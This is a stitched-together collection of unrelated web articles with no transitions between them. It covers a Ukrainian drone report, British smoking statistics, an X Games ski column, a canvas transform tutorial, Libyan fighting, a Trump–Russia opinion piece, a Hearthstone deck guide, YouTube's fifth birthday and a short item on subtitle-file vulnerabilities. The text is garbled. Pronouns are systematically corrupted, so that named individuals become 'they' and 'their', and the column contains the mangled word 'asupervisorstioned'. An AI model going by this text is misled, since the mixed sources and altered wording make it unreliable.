A source connected with the Russian defense industry confirmed to The Intercept that the drone pictured was the Russian-built E08. But the source, who asked not to be identified because they were not authorized to speak on the record, said the drone “was used as an aerial target and shot down at Eisk military range on the Russian side of the Azov sea two weeks ago.”
The Ukrainian side, however, said the drone was being used for reconnaissance and equipped with a camera.
“The photographic apparatus, which was housed in the nose, was seriously damaged when the drone was brought down,” Artem said. “But in any case, pictures are transmitted to the remote operator, rather than recorded onboard on a hard disk.”
Separatists use the drones during artillery bombardment to spot the location of Ukrainian forces, according to Artem. “We see these drones spotting our locations and then a little later, we are targeted by artillery,” they said.
Photo: Askold Krushelnycky
— Sharon Weinberger contributed reporting from Washington, D.C.
The proportion of male smokers has dropped to its lowest levels in 40 years.
On No Smoking Day, the annual push to help smokers in Great Britain kick the habit, ONS reveals the number of male smokers has reduced from 51% in 1974 to 20% in 2014.
For women it was 41% in 1974, compared with 17% in 2014.
What else has changed between 1974 and 2014?
Download the data
Across all age groups men were more likely to smoke than women.
Download the data
There has also been a drop in the number of cigarettes smoked daily.
On average, men smoke 1.7 more cigarettes a day, compared to women. While those aged 25 to 34 are the most likely to smoke, they smoked the lowest amount per day - at 9.6 cigarettes - while smokers aged 50 to 59 smoked the most at 13.4 cigarettes a day.
Men aged 60 and over and women aged 50 to 59 bucked the downward trend in cigarette smoking between 2013 and 2014 by lighting up more. The men increased their consumption from 13.7 to 14.6, while the women's use rose from 12.0 to 12.3.
Download the data
Smoking is the leading cause of preventable death in Great Britain, causing almost 80,000 deaths in England in 2013, according to Adult Smoking Habits in Great Britain 2014. Estimates from the Welsh Government put the annual death toll at 5,500, whereas the Scottish Government estimates 13,500.
Download the data
In 2014, 55% of men who had previously smoked had quit, compared with 54% of women.
Download the data
FREESKIER's former Senior Editor, and current NYC-based Senior Contributor, Nate Abbott comments on 2015 X Games, from bed, on drugs, following ACL surgery.
At 9:21 p.m., Eastern Time, my stream on ESPN3.com showed Maddie Bowman landing their first run. Maddie, with three runs to go, hadn't looked particularly nervous before the run. And afterwards, they didn't have any sort of amazing emotional reaction. With no other skiers looking like they would challenge her, the contest was over. As three-peat champion, their first as a 21-year-old legal bar-patron; she's maybe going to have the best X Games of anyone in 2015, with three nights to enjoy Aspen still to come. It's a well deserved victory, but still one fraught with problems.
The women's halfpipe finals at X Games got off to an unbelievably bad start. After a lead segment that mostly mentioned Shaun White, ESPN cut back to the women by showing some silly DJ onscreen while the announcer, Uncle E—he of the funny hats and not so funny jokes—commented on the “harem of goddesses” surrounding DJ Dorky. Do they know what that word means in a literal sense? Do they know what its connotations are? How does anyone at ESPN allow that? I'll move on, because, well, wow.
I'm going to cause more problems though, because this was not a good ski contest either. Sure, Maddie executed their runs well, there were a few new tricks and a couple other ladies threw good runs; in rah-rah tradition I should talk about the skiing. But honestly, if you dropped this contest into 2011, no one would be blown away, talking about “the future of the sport is now!!!” or any such excitement. The sport of women's halfpipe just hasn't progressed at a rapid clip and I would not be shocked if the organizers of X Games dropped women's halfpipe altogether.
2015 X Games superpipe champion Maddie Bowman.
Now let me backtrack for a second and say a few things. First, I'm on drugs. I had ACL reconstruction surgery six days ago and I planned very carefully to reach peak narcotic-influence during the second run of the contest. Since I cannot be there, I'm going to write free-flowing and opinionated pieces during each of the five freeskiing event finals during 2015 X Games. This story was supposed to be the first. It was to be a train-of-thought diary of my night, a view-from-bed, stream of consciousness piece. Except that on top of the knee pain, I had a migraine last night. So I vomited during the contest (unrelated to the skiing, which, if boring, was not offensive), and spent the night hallucinating, moaning, thrashing around and generally miserable.
Second, I love these ladies and that they're out there doing something that 99.9-percent of the world cannot do. They do not get enough credit for the toll it takes on their bodies and the imbalance between risk and reward. I've spent many days shooting photos with the ladies, because I think they deserve to be in ski industry magazines. I don't gain a top financial payout, but I respect how tough and hard-working these women are.
Once the migraine broke this morning, I struggled back and forth with the realization that women's halfpipe is not worth it. It's not worth it to the spectators (and clearly then to the advertisers and TV production). And it's not worth it to the skiers. For many years, I've been having these discussions. They ebb and flow.
Roz Groenewoud is one of the best women's pipe skiers, one who could possibly rival Maddie. They fell on their first run and withdrew from the competition. Roz is tall and their body seems ill-fit to halfpipe skiing. Like Peter Olenick, their height creates a ton of leverage through the transition, especially on a backseat landing low in the tranny. It makes for frequent injuries. But Peter's knee problems were an anomaly in men's halfpipe, while Roz's injuries seem commonplace. Sarah, Megan Gunning, Jen Hudak, Angeli VanLaanen, etc., etc. I remember the injuries and I watch each contest holding my breath, hoping no one gets injured.
Even the smallest injuries make women's halfpipe a discipline defined more by attrition than by innovation. Every time someone ends up sidelined, whether for two weeks or two months, it is a detriment to progression throughout the whole sport. Would training or competing in smaller pipes reduce the injuries and help create more technically sound skiers? Will the cachet, coverage and prize money eventually drive enough athletes into the sport that it will become a marquee event? I'm not sure, but these are questions the entire ski industry should be addressing before someone in television production or some fat, rich fuck from FIS decides without our input.
As an anonymous source within the production of X told me their view of Maddie, “She knows they can do the same run, not even try to grab and still beat everyone because it is so much harder. We need Sarah back.” They mentioned other ladies who pushed the sport. To me, it's time to push the halfpipe discipline in another way.
Ayana Onozuka claims their silver medal run.
My proposal is to include a women's ski rail contest in the next X Games. I see more progression on the rails from the ladies and I see far fewer major injuries. It would take some work convincing the powers that be, but it is worth taking steps (lower level comps, filming, a top level athlete organized comp) to put the power in our hands. In the long run, hopefully women's halfpipe will escape its current plateau and push forward. But 'til then, let's give some other women a visible segment day-in and day-out in terrain parks all over, with talented and visible pros like Maude Raymond, Kim Lamarre, Kaya Turski and even an underground scene—a chance to showcase their talent.
Related: Pro skiers take aim at FIS in passion-filled blog posts
Taming 2D Transforms in HTML5 Canvas Posted on 31st March 2011 by Alex Cruikshank in Development
This is the second post in a series on creating custom interactive visualizations in canvas. The first post is here.
The canvas API contains five methods (rotate, scale, translate, transform, and setTransform) used to transform the drawing context. We typically use the transform API when we want to rotate or scale some element of the visualization (especially text). In canvas, we don't actually move the elements. Instead we transform into a new coordinate system where the element is no longer scaled, rotated or translated and then draw normally. The difference is subtle, and you can get by with ignoring it so long as you remember to execute the transforms before you draw. But, once you embrace this way of thinking, transformed coordinates can be a powerful way to break down complicated drawing tasks into simple steps. In the remainder of the post I'll describe how to use transforms effectively and how to overcome the difficulties involved in making transformed objects interactive.
Examples: (an HTML5 browser is required to view these)
The Basic Idea
In the interest map project I described in a previous post, I want to use bezier curves to draw arrows using my own formula for the ratios of the arrow length, arrow head length, and arrow head height. The x and y coordinates of the head and tail of the arrow are known, but using these to figure out the location of the sides of the arrow head and its control points require a lot of rather messy trigonometry. If we create a coordinate system where the tail of the arrow is at the origin and the head lies on the x axis (this still requires a little bit of trig), the coordinates simplify to {0,0}, {l-C,f(l)}, {l,0}, and {l-C,-f(l)} where C is the length of the arrow head and f(l) is a function that gives its height. Also notice that, after a transform, we can use the same code to draw the horizontal and vertical axes (so long as we can handle the difference in lengths). Complex visualizations can usually be broken up into components like this that each have a natural coordinate system. The trick then becomes calculating an appropriate transform.
A Bit About The Math
I'm not going to get deep into linear algebra or affine geometry, but I think a little knowledge of how transforms are implemented is required to use them effectively. Any change of coordinates can be represented by a single transformation matrix. You don't need to know what a matrix is so long as you understand that it's kind of like a number in the sense that you can multiply it with points or other transformation matrices. When you multiply a point from your transformed coordinates with a transformation matrix, you get another point that is transformed back into the original coordinate system. The canvas context always has a transformation matrix, and whenever you call a drawing API method (e.g. fillRect, bezierCurveTo, arcTo, etc.) it multiplies each of the points by this matrix before it renders any pixels from the shape to the canvas.
When you multiply a transformation matrix by a another transformation matrix, you get a new transformation matrix that is a combination of the two. For example, if you have a transformation, A, that represents a coordinate system rotated 45 degrees and another transformation, B, that represents a translation of the origin 100 pixels along the x axis, then C=A*B is a transformation where the origin is 100 pixels out on the 45 degree line. A lot of the power of Canvas's transformation API derives from the ability to combine transforms like this. With the exception of setTransform(), all of Canvas's transform methods (rotate, scale, translate, and transform) are applied by creating a matrix representing the operation and then multiplying it with its current transform to create its new transform. One important different between matrix multiplication and normal multiplication in that matrix multiplication does not commute (A*B != B*A). So you'll get a different result if call context.rotate() and then context.translate() than you would if you called context.translate() then context.rotate().
Save and Restore
The save() and restore() methods in canvas are a convenient way to avoid specifying stroke and fill styles over and over again in a drawing, but they become critical when you start using transforms. The save() method takes all the current state of the canvas context including the current transform and pushes it on a stack. You can then make as many modifications or transforms as you like. When you're done drawing, you call context.restore() and everything is back to the way it was before you called save(). You can always reset the fillStyle or lineWidth, but there is no trivial way to reset the transform (you can use setTransform() if you really know what you're doing). Using save() and restore() is habit you want to acquire.
Some Concrete Examples
Alright, enough theory: Here's some code. The first example is the obligatory fractal demonstration. 2D transforms make quick work of fractals, because, by definition, they are the same thing over and over at different scales and in different places. At any rate, the application first creates a binary tree (see the full source). Then, beginning with the trunk it draws the text at the origin (in its transformed coordinates). Then, for each branch, it translates the origin to the end of the word, rotates in the direction of the next branch, and scales to the size of the branch. It then repeats the process until it gets to a leaf.
function draw() { var ctx = document.getElementById('display').getContext('2d'); ctx.font = 'bold 30pt Georgia,Times New Roman'; ctx.translate(ctx.canvas.width / 2, ctx.canvas.height); ctx.rotate(-Math.PI / 2); draw_branch(ctx, tree); } function draw_branch(ctx, branch) { ctx.fillStyle = branch.branches ? WOOD_COLOR : LEAF_COLOR; // draw text in default font ctx.fillText(PARTS[branch.type], LEFT_OFFSET, TOP_OFFSET); if (!branch.branches) return; for (var i = 0, b; b = branch.branches[i]; i++) { ctx.save(); // IMPORTANT!! // move origin to end of text var text_width = ctx.measureText(PARTS[branch.type]).width; ctx.translate(text_width + LEFT_OFFSET, 0); // scale coordinates to predetermined value for branch ctx.scale(b.scale, b.scale); ctx.rotate(b.theta); // rotate axes to be in line with branch draw_branch(ctx, b); ctx.restore(); // IMPORTANT!! } }
The name tags in the interest map (source) presented a more realistic problem. We wanted to simulate the way people attached their name tags on the skill cards. The placement of each name tag was essentially random except that the tags were always near the edge of the card and they were always nearly horizontal. This requires 4 transforms: A translation to the center of the skill card (A), A rotation to give it a unique position on the card (B), A translation to the edge of the card with a random messiness factor (C) and a rotation back that's roughly equal to B so the text is roughly horizontal (D). The following is the (somewhat simplified) function that transforms the coordinates then draws the box and the text around the origin. In this function, the angle of the name tag on the card, r, is given.
function nametag(ctx, cardx, cardy, person, r) { var text_width = ctx.measureText(person.name).width, width = text_width + 10; ctx.save(); // make center of card the origin ctx.translate(cardx, cardy); // rotate in direction of tag placement on card ctx.rotate(r); // translate to edge of card (with a little permutation) ctx.translate(-TAG_RADIUS - +4 * Math.random(), 0); // rotate back with permutation so that text is nearly horizontal ctx.rotate(-r + .4 * (Math.random() - .5)); /* ... set box style parameters ... */ // draw box centered around (transformed) origin ctx.beginPath(); ctx.rect(-width / 2, -10, width, 20); ctx.closePath(); ctx.fill(); ctx.stroke(); /* ... set font style ... */ // draw text centered around (transformed) origin ctx.beginPath(); ctx.fillText(person.name, text_width / 2, 0); ctx.closePath(); draw_nametag(ctx, person, interest); ctx.restore(); // DON'T FORGET!!! }
Most of the time, thinking in terms of coordinate transforms will make your life a lot easier. The exceptions come when you need to relate shapes drawn in one coordinate system with shapes or points specified in another. This is especially true when you need to make transformed elements interactive. I'll talk more about this problem and some solutions in the next post.
Mondo x SteelBook® is pleased to present our first release available in the USA, #006: FLASH GORDON! In conjunction with Universal Pictures, we're incredibly excited to release the 1980 sci-fi space adventure based on one of the most influential comics of all time.
This isn't the first time we've used Martin Ansin's artwork on a SteelBook (see #001: Looper), and are thrilled to have another opportunity to rework their incredible style into the SteelBook format. Their artwork for FLASH GORDON - which was first released as a poster at a Mondo Gallery show last year - translates so well onto the outside, enhanced with a beautiful glossy finish, and extends into inside of the case & disc.
Flash Gordon in Mondo x SteelBook® is available to pre-order now and will be shipping from Target on July 28. Click here to Pre-Order!
TRIPOLI/BENGHAZI Libya (Reuters) - Forces from the Libyan city of Misrata on Saturday seized Tripoli's main airport after more than a month of fighting with a rival group, a Misrata spokesperson said.
Pictures on social media purportedly showed Misrata fighters celebrating at the terminal building and standing on civilian planes in what, if confirmed, would be a big development in the battle to control the capital.
Arab channels Jazeera and Al-Arabiya also said Misrata forces were controlling the airport, although Reuters was unable immediately to access the area. Heavy shelling could be heard in other parts of the city.
War planes had earlier struck Misrata positions in Tripoli in an attack claimed by renegade general Khalifa Haftar. The raids killed 10 people and wounded dozens, the Misrata faction said.
The fighting is the worst since the overthrow of Muammar Gaddafi in 2011.
In the NATO-backed campaign to oust Gaddafi, fighters from the western region of Zintan and Misrata, east of Tripoli, were comrades-in-arms. But they later fell out and this year have turned parts of Tripoli into a battlefield.
Haftar launched a campaign against Islamists in the eastern city of Benghazi in May and threw their weight behind the Zintan fighters.
In Saturday's fighting, residents heard explosions early in the morning near the airport, where the two groups have been fighting for control for more than a month.
Local television channel al-Nabaa said planes had attacked four Misrata positions. A Misrata spokesperson said the planes had come from Egypt and the United Arab Emirates, two countries which have cracked down on Islamists.
But Haftar's air defense commander, Sager al-Jouroushi, told Reuters that their forces were responsible for the attack. Haftar's forces also claimed responsibility for air raids on Misrata positions in Tripoli on Monday.
Western countries and Egypt, worried about Libya becoming a failed state and safe haven for Islamist militants, have denied any involvement. The Libyan government has said it does not know who is responsible for the air attacks.
In a challenge to the parliament elected on June 25, the spokesperson for Operation Dawn called for the old General National Congress (GNC) to be reinstated. Misrata forces have rejected the new House of Representatives, where liberals and lawmakers campaigning for a federalist system have made a strong showing.
BENGHAZI CLASHES
Fresh fighting also erupted between Haftar's troops and allied army special forces with Islamists in two Benghazi suburbs, where loud explosions could be heard. Four soldiers were killed and 31 wounded, a hospital medic said.
Prime Minister Abdullah al-Thani called on Egypt and Tunisia to open their airspace again for flights to western Libya. Both countries canceled most flights to Libya for security reasons after the air strikes, cutting off a vital link to the outside for Libyans and foreigners fleeing fighting.
Libya has used the small Matiga airport in Tripoli for civilian traffic since the main airport was turned into a battlefield last month. The tower, runway and at least 20 aircraft have been damaged, officials have said.
When flying into Matiga, passengers can sometimes see smoke rising from battles in and around the main airport.
The violence has prompted the United Nations and foreign embassies in Libya to evacuate their staff and citizens, and foreign airlines largely stopped flying to Libya.
Tripoli has mostly slipped out of control of the government, with senior officials working from Tobruk in the east, where the new parliament has based itself to escape the violence in Tripoli and Benghazi.
Libya's central government lacks a functioning national army and relies on militia for public security. But while these forces receive state salaries and wear uniforms, they report in practice to their own commanders and towns.
Troy Deeney revealed immediately after Watford's 2-1 win over Arsenal that Gabriel has apologised for that horrific challenge in the first half.
The centre-back flew in, both feet off the floor, and could easily have broken the striker's leg – which Deeney did point out. However, the Watford man claims that Gabriel has apologised and simply stated that they're ‘men' at the end of the day and therefore, they move on from these incidents.
I'm sure the win makes it a little easier to move on from, eh Deeney?
Apart from the sexist undertones, the striker makes a good statement and it's good that they can move on from this. However, if Gabriel continues to act this way on the pitch, it's only a matter of time before they do someone serious damage. He's quickly turned into a liability.
Watch Deeney's comments regarding Gabriel below.
Donald Trump is a chump, know how we feel, punk
Tell ‘em that God comin'
And Russia needs a replay button, y'all up to somethin'
Electorial votes look like memorial votes
But America's truth ain't ignorin' the votes
— “The Heart Part 4” by Kendrick Lamar
I want to begin this conclusion by highlighting the word “theory” in the title. I don't believe that I have proven anything beyond a doubt in this series, but I have highlighted a pattern of behavior that all points in one direction. I could be wrong, but I just spent 22,000 words going over this so I clearly don't think I am. I fully acknowledge that I am working with an incomplete set of information, and some of the more unexplainable items in this saga could be dismissed with additional insight.
That said, there is one thing that is clear: Trump has been in business with Russian oligarchs for at minimum, nearly two decades, and has demonstrated a desire to expand into Moscow as far back as the 1980s. The fact that the Treasury fined them $10 million for “significant, long standing anti-money laundering violations” at Trump Taj Mahal only heightens the suspicion surrounding their dealings. Ask any Russian (and I did in order to help me understand many of the Russian sources used in this column), and they will tell you that it is a well-known fact that the Taj Mahal was a prime vacation spot for wealthy Russians.
Given Trump's five bankruptcies running companies whose business model literally is rigging the game against their customers, it's highly unlikely that they could domestically obtain the large credit lines that their voracious business appetite required. It's undeniable that they were able to acquire some form of credit given that their businesses endured past their bankruptcies and still exist to this very day. If they couldn't get a million dollar-plus line of credit from Wall Street, where did they get it from? Well, people they have done business with in the past would be a good target—especially whomever they were laundering money for in the Taj Mahal, since they clearly would be able to find avenues to deliver it to them tax-free (or at least tax-lite).
The fact that they have refused to settle cases, but settled one around Trump SoHo with the explicit provision that the people bringing the lawsuit against them must stop cooperating with the federal government in a parallel criminal inquiry raises an endless line of red flags. Those red flags are further elevated when you dig into the fact that the financiers of that project leave Trump two degrees of separation away from an Icelandic fund which is very clearly propped up by Kremlin cash. Even more so when you can connect that fund to other projects of their like the failed Trump Tower in Toronto.
President Trump has been all over the map with whatever policies they support at any given moment. They have proposed covering all Americans with health care, but says they are “100%” behind this GOP bill that does not hide the fact that it will throw tens of millions of Americans off health insurance. They said they wanted to get rid of the entire national debt in eight years, yet their first budget proposal adds to it. I could go on and on and on with a multitude of positions of which they have taken every side on, save for one: Vladimir Putin. When Bill O'Reilly set them up for a layup to confirm the very obvious thuggery of Putin's regime, Trump's response was “we have bad guys too.” For some reason, Trump will not speak ill of an adversarial government that our entire intelligence community says clearly intervened in the 2016 election to hurt Hillary Clinton (and therefore, help Trump), and that is why the rest of their connections raise suspicion. If they don't say a bad guy is bad, why?
I believe the answer to this question is that Trump has been laundering money for wealthy Russians for years (and by proxy, the Kremlin, since no one gets rich in Vladimir Putin's Russia without their consent), and not only are many of their businesses largely propped up by Kremlin-connected cash, but they have so much evidence of their illegal activity aiding and abetting a regime opposed to the United States that it effectively holds a gun to their head 24/7. They know that if they tighten the screws on Putin, that they can be ratcheted up on them tenfold, and that is why they refuse to speak negatively about the Kremlin. Trump is a self-interested actor to the very end, and so all their actions must be viewed through that lens.
Russia's interest in meddling is much more certain. America has been utterly shameless in its attempt to influence supposed democratic processes across the globe, and this brazen Time cover bragging about installing Boris Yeltsin in the Russian government is all the motivation Russia should need. Many are concerned that all this saber rattling will set off another budding military conflict like what we went through in the Cold War, but that is old-world thinking. Russia is not a superpower, as their economy is entirely dependent on oil. The value of their currency moves in tandem with the price of this commodity underwriting it.
source: Tradingeconomics.com
Their military was still in shambles a little over a decade ago, and even though they have made some dramatic investments to modernize it, they still lag far behind the behemoths that are the United States, China, and our NATO allies in Europe. In short, they can't play on the same level as other global hegemons. What they can do is weaponize their most potent skill: disinformation. The Kremlin has always mastered the art of manipulating information, and the digital age has provided them with a power that rivals the moment Ernest Rutherford split the atom in 1919.
Russia is not allied to Donald Trump, but against traditional American policy, and Trump simply provided them with an ideal vehicle to accomplish those goals. I don't believe that their influence was so quid pro quo that Trump was literally taking orders from the Kremlin, but that their manipulation was more amorphous, and it came in the form of surrounding Trump with people in their orbit like Paul Manafort, Michael Flynn, and Carter Page. Trump is the opposite of a policy wonk, so all the Russian government needed to do was find a way to package their interests in a way that aligned with his, and the dramatic failure of American foreign policy over the last few decades provided them with the perfect cover.
After the debacle of the Iraq War, most Americans now believe that any deviation from the status quo is preferable to the policy pursued from the end of World War II to today—so saying things like “NATO is obsolete” didn't ring alarm bells the way it would have it been uttered during the 1990s. Once Trump got the ball rolling, combined with their generally disorganized thoughts, it was easy to cloud the obvious storyline at the heart of all this. The fact that Putin has tried to corroborate Trump's recent statements like their crime-ridden Sweden accusation makes collusion all the more plausible, and at the very least, establishes a level of cooperation.
The classic phrase “the cover-up is worse than the crime” is wrong. It really should be “the cover-up is what alerts us to the crime.” As I write this, Devin Nunes—who took the extraordinary step earlier this week of briefing the White House on information they did not share with their committee members—unilaterally backtracked on a promise the House Intelligence Committee made to the American public, and cancelled the rest of the open hearings planned on this topic. To use a phrase from the 2008 election, they have completely gone rogue from their entire committee.
Schiff says Nunes didn't share info with committee Republicans or Democrats: "All of us are essentially in the dark" https://t.co/medIVEYewt — NBC News (@NBCNews) March 24, 2017
This follows the pattern of other Trump associates like Flynn, Manafort, Page and Jeff Sessions of backtracking on previous commitments and statements—all of which obscure the truth of whatever happened as it relates to the Kremlin. Whatever you think of this saga, you must admit that this is not how innocent people act. Everything emanating from Team Trump points towards a cover-up of something related to this Russian investigation that we now can confirm has a focus on some of their associates.
Let's remove all analytical reasoning from this for a moment and fall back on our basic human instincts. If you knew nothing about this entire ordeal, would you believe this guy?
Now the White House is saying that their former campaign manager had a “very limited role,” that the man they appointed National Security Adviser was a “volunteer,” and a member of their transition team who chairs the House Intelligence Committee overseeing this investigation claims they have never heard of Carter Page—who was one of five foreign policy advisors initially named to Trump's campaign—and Roger Stone, a longtime D.C. operative who has been advising Donald Trump since the 1980s. The National Enquirer, which is essentially a Trump-branded tabloid, is now asserting that Michael Flynn is a Russian spy and that Trump was the one who caught him. These are all very recent talking points which deviate from their previous one that this entire investigation is bunk, and that the asupervisorstioned four advisers in question are all above board.
The walls are closing in on the White House, as the drip drip drip of information leaking from the intelligence community continues this slow march towards the obvious conclusion: Donald Trump is beholden to Russian interests, and they willingly accepted their help in their campaign to become president of the United States. This is the most important story of our time, and the response to the remarkable efforts by the White House to stonewall the investigation will either prove America's resilience or accelerate our descent into the dustbin of history's great empires.
Part one: How Donald Trump's Own Words Connect them to Russia
Part two: How Donald Trump's Businesses are Financed by Russian Cash
Part three: The Mysterious Deaths and Arrests of High-Level Russian Officials
Part four: Donald Trump's FISA Paranoia
Jacob Weindling is Paste's business and media editor, as well as a staff writer for politics. Follow them on Twitter at @Jakeweindling.
Warning: Dreamhack Spoilers
Written by Team [DKMR] (Sponsored by HearthStats)
Introduction
Greetings all! [DKMR]BorN is back with another deck guide. Today we'll be looking at a deck that has fallen slightly out of favor lately: Handlock. Although not being played as much, due to the flavor of the month being its counter, Hunters, Handlock is still a very strong and fun deck to play with.
What is Handlock?
Handlock is a Warlock Control deck that abuses Warlock's Hero Power, Life Tap, to build a large hand; this allows the player to use cards such as Mountain Giant or a 4/9 Twilight Drake on turn four. Not only does this give you strong board presence, but card advantage typically from Life Tap.
Without answers like Big Game Hunter for Mountain Giant or silence for the Twilight Drake, Handlocks further establish their lead by taunting up their big minions or even using Faceless Manipulator; use this when your opponent lacks the removal to deal with your huge threats. This is just the tip of the iceberg when it comes to the big creatures tucked away in this monstrous deck.
The Deck
Just glancing at the deck list, almost one third of the deck are cards costing 6 manas or higher. That's a pretty steep curve! Four of the eight are Mountain Giants and Molten Giant; which can be played sooner with the more cards you have in hand or the less health your hero has, respectively.
Another card here normally only seen in Handlock decks is Lord Jaraxxus; a card which replaces the Warlock hero with Lord Jaraxxus who has 15 health, a 3/8 weapon, and a ridiculous Hero Power that summons a 6/6 Infernal for only TWO manas. Although on paper they sound overpowered, we've seen them be dropped from Handlock decks for cards better suited to help against Hunters, yet they remain on our list as they are the key win condition to beating some decks, such as Warrior Control.
Note when playing Lord Jaraxxus: Molten Giants mana cost will now be based off Lord Jaraxxus max life of 15 instead of the 30 health of the Warlock. This means a Molten Giant will cost 10 manas when Jaraxxus is at five health, so exercise caution before playing Jaraxxus.
The last late game minion in the deck, Alexstrasza, serves two main purposes. First, our hero will be taking lots of damage from Life Taps, Hellfire, and enemies. Alexstrasza helps us boost our life back up when we get low so we can stay in the fight. The other use of Alexstrasza is to be used offensively on your opponent. This helps us setup for lethal damage with our Leeroy Jenkins plus Power Overwhelming plus Faceless Manipulator combo, dealing 20 damage with just those three cards alone or even more with Soulfire!
Besides Soulfire, there are some other potent spells utilized by Handlocks. Siphon Soul is a powerful hard removal spell that also restores three health to your hero. Hellfire is an area of effect removal that deals three damage to ALL characters. This can also be used to help push your health in range to play Molten Giants.
The last of these is Shadowflame; a spell which sacrifices a friendly minion, dealing its attack as damage to all enemy minions. This is an excellent way to clear your opponent's minions, as sacrificing cheap yet high attack minions like Ancient Watcher can devastate your opponent. It's also worth noting Shadowflame is affected by added spell damage!
Play-style and Strategy
When going up against Midrange and Control decks, it's best to mulligan for one of your strong turn four plays like Mountain Giant or Twilight Drake. If you already have one, try to get strong spells like Siphon Soul and Hellfire to help with board control. Against Aggro decks, Hellfire, Molten Giants, and taunt-givers are your main priority.
The play-style against Midrange and Control decks is pretty simple, just Life Tap the first few turns to build up cards, then play one either Twilight Drake or Mountain Giant on turn four. From there you should focus on developing a strong board and removing your opponent's minions; eventually either flat out winning with your giants, or using Alexstrasza to setup a Leeroy combo finisher.
As for going against Aggro decks, be careful with Life Tapping, as you'll want to keep your life up while you try to stabilize. Although sometimes it can be okay to go for the strong turn four play, a simple Ancient Watcher with taunt can be enough to buy you time to make it to the late game where taunted giants will crush your opponent's chance at winning.
Common Match Ups
Warrior Control
Try to keep their armor down so they can't Shield Slam your giants. If you have an Ancient Watcher and an Ironbeak Owl, you can harass your opponent into wasting their precious removal on your watcher, while also knocking down their armor. Earthen Ring Farseer should be used to prevent your minions from being executed, or to keep you out of combo range. Be careful of Brawl as you don't want to let your big minions die for free.
Hunter
Do everything possible to survive until turn nine. Taunting up Ancient Watchers and Molten Giants are the best ways to victory. Once you get to turn nine, use Alexstrasza and Lord Jaraxxus to keep healing you back up while you try to steal a win in this very unfavorable match up.
Aggro Warlock
Hellfire and Shadowflame will buy you time against their beatdown, but what really seals you the win is two big taunts. Aggro Warlock really struggles to efficiently get passed your taunts unless they are running The Black Knight; so once you stabilize with taunts, your opponent has absolutely no chance of winning.
Miracle Rogue
Your opponent will try to Sap your early big minions. This may discourage you from playing them, but keep trying to get them to stick to the board. Doing so forces your opponents to burn Saps early, which clogs up their mana preventing them from doing other things. Keep throwing down minions, especially with taunt, as then the Rogue will have to use cards like Eviscerate to take out your more durable minions. Keep a taunt down at all times to prevent potential Leeroy Jenkins finishers.
Druid
Unless your opponent has a Big Game Hunter or Keeper of the Grove ready for your threats, this should be a pretty easy match up, since Druids lack hard removal to take care of your beefy creatures. A pretty straightforward match up, just keep removing their minions while you stabilize; Druids really struggle here unless they can Innervate an early big minion like Chillwind Yeti.
Card Substitutions
If you're looking to drop cards from the deck like Lord Jaraxxus or looking for card alternatives, there are several cards other Handlock variants choose to use. ylvanas Windrunner and Harrison Jones are notable tech cards, whether you need help controlling the board or are having trouble with weapons; these two cards make great additions to any control deck.
If you aren't seeing many Big Game Hunter targets, drop it for a Shadow Bolt or a second Earthen Ring Farseer. If you're looking to replace specific cards, feel free to reach out to us at DKMR for help.
Until Next Time
Today we looked at the standard Handlock build and how it should be played. Although Handlock has seen a decline, it is a deck with much untapped potential. We recently saw Gaara of Team Tempo Storm shows off a more tempo-oriented version of Handlock at Dreamhack Bucharest, ultimately becoming the tournament's champion. Keep track of your stats on on Hearthstats This could be the start of a new wave of Handlock varieties. Stay tuned…
You can find all of DKMR's streamers at www.dontkickmyrobot.com with the days they stream! If this deck peaks your interest, check out [DKMR]BorN as they are a fabulous deck builder and a fantastic player.
Guide written by [DKMR]BorN
Discussions about this topic brought to you by Team [DKMR]
Decks to Watch Out For
As always, big name players and big name tournaments tend to be the trend setters of the meta. With Dreamhack Bucharest last weekend, top players gathered and revealed some very interesting and powerful decks. These decks will no doubt be showing up on the ladder in the coming weeks. These decks are: Gaara's Warlock, Amaz's Druid, and Danielctin14's Shaman.
It's hard to believe that YouTube, which now streams more than 1bn videos a day, only registered its domain name five years ago
People who want to see the latest viral videos, very old TV commercials and pop videos, great sporting moments or almost anything else that can be delivered in a brief video, will usually turn to YouTube, which now serves up more than 1bn streams a day.
YouTube has become so engrained in everyday life online that we now take it for granted, but it didn't even exist five years ago. The startup registered its internet domain name, youtube.com, on 14 February 2005, as co-founder and chief executive Chad Hurley recalled on the company blog yesterday.
However, it was still some way from providing a service, and YouTube wasn't officially launched until December. No doubt there will be more fifth birthday celebrations then.
Although there were other online video services around at the time, YouTube took off. It made it easy to upload and view videos, and also to embed them on blogs and other web sites, so you didn't have to go to YouTube to watch them: it was "like Flickr for videos". Google bought the company for $1.65bn in 2006, less than a year after its launch, but is still working on ways to make money out of it.
YouTube has upset some movie studios, TV stations, music companies and other content providers because users often upload clips that they may regard as violations of their copyrights, rather than as free publicity. However, it has also helped lots of ordinary people to reach a vast audience, and achieve some species of fame.
YouTube's most-watched video at the moment is "Charlie bit my finger", which has been viewed 160m times. Judson Laipply's Evolution of Dance is now trailing in second place with 137m views, ahead of Miley Cyrus's music video for 7 Things (110m).
Seen them all before? Let us know your favourite YouTube videos below.
YouTube's top five videos
1. Charlie bit my finger - again ! (160,150,052 views to date)
2. Evolution of Dance (137,007,826 views)
3. Miley Cyrus - 7 Things - Official Music Video (HQ) (110,524,702 views)
4. Hahaha - Small daring boy (107,357,309 views)
5. Jeff Dunham - Achmed the Dead Terrorist (106,529,954 views)
As many media player apps download subtitles from repositories they explicitly trust, all it takes is an attacker who sneaks a malicious file into the repository in such a way that you're likely to download it. An intruder can manipulate a ratings-based subtitle system to push their file to the top, for instance. Combine that with the complexity of the subtitle world (there are over 25 formats, and each media player handles them differently) and you get a plethora of security holes.
The good news: in some cases, it's fixed. PopcornTime, Stremio and VLC all have updated versions (you can find them in the source link below). However, it's not guaranteed that your client of choice has a patch ready and waiting. Kodi only has a source code fix available as of this writing. If you're using another media player with subtitle support, you may want to be careful about using it until you know that the programmers have addressed this exploit.
Recently I've been having to deal with creating HTML email templates much more than I had in the past. Most of my previous experience wouldn't go much further than creating simple transactional emails consisting of a simple table enclosing a bunch of text, nothing too fancy.
Unfortunately, when it comes to producing something of a higher standard, such as an appealing newsletter aimed to attract users into your site, or even to convert those visits into sales, you have to go a bit beyond a simple table with text. And it is when you start doing fancy stuff that you realise what a nightmare it is to taylor a proper email template. Most of the techniques you use on a daily basis when creating responsive web apps are invalidated when you realise that email clients are even more anarchic than the earlier versions of Internet Explorer when it comes to parsing and rendering HTML.
